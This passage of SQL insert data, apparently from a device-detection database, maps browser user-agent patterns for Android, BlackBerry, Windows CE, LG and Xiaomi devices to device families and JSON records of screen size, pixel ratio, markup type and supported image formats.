Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Maui Browser','','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)','windowsce','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/4.0 (compatible; ICS)','','{\"type\":\"desktop\",\"markup\":\"\"}'),('Mozilla/4.0 (compatible; Linux 2.6) NetFront/3.4 Kindle/2.0 (screen 600x800)','','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":300,\"screenHeight\":380,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800','windowsce','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":300,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; PPC)','windowsce','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; PPC) Opera 8.65','windowsce','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":470,\"screenHeight\":620,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; PPC; 240x320) Opera 8.65','windowsce','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":310,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/4.79 (Windows NT 5.0)','','{\"type\":\"desktop\",\"markup\":\"\"}'),('Mozilla/5.0 (Android 4.*; Mobile) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 4.*; Tablet) Firefox/*','android','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 5.*; Mobile) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 5.*; Tablet) Firefox/*','android','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 6.*; Mobile) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 6.*; Tablet) Firefox/*','android','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 7.*; Mobile) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 7.*; Mobile; LG-M150) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 7.*; Tablet) Firefox/*','android','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 8.*; Mobile) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 8.*; Mobile; LG-H700) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 8.*; Mobile; LG-M255) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android 9; Mobile) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android; Linux armv7l) Gecko/* Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Android; Mobile) Firefox/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (BB10; Kbd) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":347,\"screenHeight\":347,\"pixelRatio\":2.074928,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (BB10; Touch) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":342,\"screenHeight\":570,\"pixelRatio\":2.2456140351,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9220) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9300) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9320) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9360) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":360,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9780) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":360,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9790) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":360,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9800) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9810) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (BlackBerry; BlackBerry 9900) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','blackberry_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":355,\"screenHeight\":266,\"pixelRatio\":1.8,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (LG-T370 AppleWebKit/* Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)','lg_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (LG-T375 AppleWebKit/* Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)','lg_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (LG-T395 AppleWebKit/* Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)','lg_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (LG-T580 AppleWebKit/* Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)','lg_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 0.*) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; GT-I5700) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; Galaxy) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; HTC Hero) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; HTC Magic) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; HTC_TATTOO_A3288) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; MB200) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; SonyEricssonE15i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; SonyEricssonX10i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; T-Mobile G1) AppleWebKit/* (KHTML, like Gecko) Mobile Safari 525.20','android_tmobile','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 1.*; T-Mobile_G2_Touch) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tmobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 1.*; dream) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile DuckDuckGo/5 Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10.*; MI 8 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":816,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10.*; MI 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":818,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10.*; MI 9 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10.*; MI 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10.*; MI 9T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10.*; Redmi Note 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10.*; xx 9 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5002D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5002E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5002H_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5007A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5007G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5007U_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5028A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5028D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5028D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5028Y_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5029D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5029E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5029F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5029Y_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5030D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5030F_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5061A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5061K_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5062Z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5102B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5102M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 5107G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 706SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 801FJ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 801SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 808SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 8092_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 901SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; 901SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A001SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A1 Alpha 20+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 